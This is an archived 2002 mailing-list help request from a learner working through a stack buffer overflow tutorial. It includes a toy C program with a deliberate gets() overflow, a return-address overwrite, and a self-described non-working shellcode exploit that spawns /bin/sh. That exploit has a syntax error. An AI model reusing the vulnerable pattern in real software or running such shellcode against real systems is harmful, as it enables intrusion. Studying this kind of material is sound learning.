In reading the following link, I decided to play with the examples and try to figure out a simple buffer overflow. Just to say I've at least made one do something predictable. At any rate, I have gotten to the point where I can make the program call the function twice before dumping. I am a little stuck when it comes to inserting the shellcode. I'll highlight what I think is the code I'm not understanding completely. Please take a look if you have time, and even if you don't, thanks for reading the post: http://www.neworder.box.sk/newsread.php?newsid=5333 Below is a modified version of the code presented on the above link. I assume NO CREDIT for this code other than I have changed a couple of variables. I'm just trying to illustrate a concept rather than create something original at this point. Keeping this in mind, read on: -------------------------------- /*This one works:*/ /*PROGRAM WITH BUFFER OF 255*/ /*TESTDS.C*/ void lame() { char small[255]; gets(small); printf("%s\n",small); } int main() { lame(); } ----------------------------------- /*Running this one and piping the output to testds makes the program run twice:*/ /*PROGRAM TO OVERFLOW TESTDS*/ /*This will hit call lame twice, so the output should be two identical lines followed by a core dump*/ /*If it does not core dump, issue the ulimit -c 10000 command*/ /*TESTDS_EXPLOIT.C*/ main() { int i=0; char buf[268]; for(i=0;i<=268;i+=4) *(long*) &buf[i] = 0x80484ca; puts(buf); } ------------------------------------ /*I don't think I have the memory address or something correct. This is where I need help. Anyone?!?*/ /*PROGRAM TO RUN SHELLCODE FROM TESTDS*/ /*1 Fill the buffer with the return address,*/ /*2 Fill the buffer with NOPS,*/ /*3 Copy the shellcode at the end of the NOPS,*/ /*4 set the home variable and */ /*5 execute TESTDS.*/ char shellcode[] = "\xeb\x1d\x5e\x29\xc0\x88\x46\x07\x89\x46\x0c\x89\x76\x08\xb0" "\x0b\x87\xf3\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\x29\xc0\x40\xcd" "\x80\xe8\xde\xff\xff\xff/bin/sh";; int main() { char buffer[268]; long retaddr = 0xbffffa10; /*Return Address, I got this from info reg esp after overflowing the buffer*/ int i; fprintf(stderr,"using address 0x%lx\n",retaddr); for(i=0;i<268;i+=4) *(long*)&buffer[i] = retaddr; /*Fills Buffer with Ret Address*/ for(i=0;i<(268-strlen(shellcode)-100;i++) *(buffer+i) = 0x90; /*Fills the Buffer with NOPS*/ memcpy(buffer+i,shellcode,strlen(shellcode)); /*Shellcode is copied at the end of the NOPS*/ setenv("HOME",buffer,1); /*Sets HOME VARIABLE*/ execlp("TESTDS","TESTDS",NULL); /*Execute Program*/ return 0; } Thanks for the assistance. -Jeremy
This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 13:14:22 PDT